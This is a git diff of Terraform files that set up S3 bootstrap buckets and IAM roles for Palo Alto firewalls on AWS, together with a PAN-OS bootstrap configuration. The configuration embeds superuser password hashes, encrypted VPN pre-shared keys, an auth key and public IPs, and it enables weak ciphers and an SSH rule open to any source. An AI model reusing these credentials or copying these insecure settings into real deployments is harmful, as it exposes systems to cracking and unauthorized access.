+resource "aws_s3_bucket_object" "content" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role" {
+  name = "ngfw_bootstrap_role"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy" {
+  name = "ngfw_bootstrap_policy"
+  role = "${aws_iam_role.bootstrap_role.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile" {
+  name = "ngfw_bootstrap_profile"
+  role = "${aws_iam_role.bootstrap_role.name}"
+  path = "/"
+}
diff --git a/aws/TGW-VPC-Mirroring/bootstrap2.tf b/aws/TGW-VPC-Mirroring/bootstrap2.tf
new file mode 100644
index 00000000..98c15942
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap2.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket2" {
+  bucket        = "${var.bootstrap_s3bucket2}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket2"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files2/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files2/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files2/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role2" {
+  name = "ngfw_bootstrap_role2"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy2" {
+  name = "ngfw_bootstrap_policy2"
+  role = "${aws_iam_role.bootstrap_role2.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket2}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket2}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile2" {
+  name = "ngfw_bootstrap_profile2"
+  role = "${aws_iam_role.bootstrap_role2.name}"
+  path = "/"
+}
diff --git a/aws/TGW-VPC-Mirroring/bootstrap3.tf b/aws/TGW-VPC-Mirroring/bootstrap3.tf
new file mode 100644
index 00000000..b8ae9407
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap3.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket3" {
+  bucket        = "${var.bootstrap_s3bucket3}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket3"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files3/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files3/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files3/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role3" {
+  name = "ngfw_bootstrap_role3"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy3" {
+  name = "ngfw_bootstrap_policy3"
+  role = "${aws_iam_role.bootstrap_role3.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket3}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket3}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile3" {
+  name = "ngfw_bootstrap_profile3"
+  role = "${aws_iam_role.bootstrap_role3.name}"
+  path = "/"
+}
diff --git a/aws/TGW-VPC-Mirroring/bootstrap4.tf b/aws/TGW-VPC-Mirroring/bootstrap4.tf
new file mode 100644
index 00000000..5c390435
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap4.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket4" {
+  bucket        = "${var.bootstrap_s3bucket4}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket4"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files4/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files4/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files4/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role4" {
+  name = "ngfw_bootstrap_role4"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy4" {
+  name = "ngfw_bootstrap_policy4"
+  role = "${aws_iam_role.bootstrap_role4.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket4}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket4}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile4" {
+  name = "ngfw_bootstrap_profile4"
+  role = "${aws_iam_role.bootstrap_role4.name}"
+  path = "/"
+}
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/README.md b/aws/TGW-VPC-Mirroring/bootstrap_files/authcodes
similarity index 100%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/README.md
rename to aws/TGW-VPC-Mirroring/bootstrap_files/authcodes
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..3b0f29bd
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files/bootstrap.xml
@@ -0,0 +1,1089 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kouigbds$mrNbt/msQehCS55jxNnYa.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <nexthop>
+                      <ip-address>192.168.101.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+          <panorama-server>18.224.86.63</panorama-server>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>FW-1</hostname>
+              <panorama-server>18.224.86.63</panorama-server>
+              <tplname>TP_stack-A</tplname>
+              <dgname>DG</dgname>
+              <dns-primary>8.8.8.8</dns-primary>
+              <vm-auth-key>999663166453480</vm-auth-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Allow SSH">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+                <entry name="EW">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <url-filtering>
+                        <member>default</member>
+                      </url-filtering>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+                <entry name="Allow Outbound">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.45</translated-address>
+                  </destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
